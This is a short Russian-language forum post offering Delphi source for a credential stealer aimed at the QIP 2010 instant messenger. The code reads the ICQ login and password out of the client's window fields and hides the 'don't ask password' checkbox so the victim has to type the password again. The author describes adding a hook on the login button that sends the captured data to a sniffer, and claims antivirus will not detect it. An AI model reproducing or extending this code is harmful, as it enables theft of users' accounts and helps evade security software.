На примере я использовал QIP 2010 и вот что получилось))
Code
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
type
TForm1 = class(TForm)
Memo1: TMemo;
Button1: TButton;
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var
okno,login,psswd,auto:HWND;
log,pass:array [0..255] of char;
begin
okno:=FindWindow('TfrmMan.UnicodeClass','QIP 2010');
if okno<>0 then
login:= FindWindowEx(okno,0,'TInfuComboBox.UnicodeClass',nil);
psswd:= FindWindowEx(okno,0,'TInfuEdit.UnicodeClass',nil);
Sendmessage(login,WM_GETTEXT,20,Integer(@log));
Sendmessage(psswd,WM_GETTEXT,20,Integer(@pass));
Memo1.Lines.Add('ICQ : '+ log);
Memo1.Lines.Add('Password : '+pass);
auto:= FindWindowEx(okno,0,'TInfuCheckBox.UnicodeClass','Не спрашивать пароль');
if auto<>0 then
ShowWindow(auto,SW_HIDE);
end;
end.
сделал невидимой галочку "запомнить пароль" чтоб жертва не нажмала и в дальнейшем не смогла зайти автоматически а мы же дописываем процедуру отлова кнопки вход и при ее нажатии отсылаем на сниффер 
то что у нас в мемо и все) такой способ вроде бы еще не использовали(следовательно антивири должны молчать)
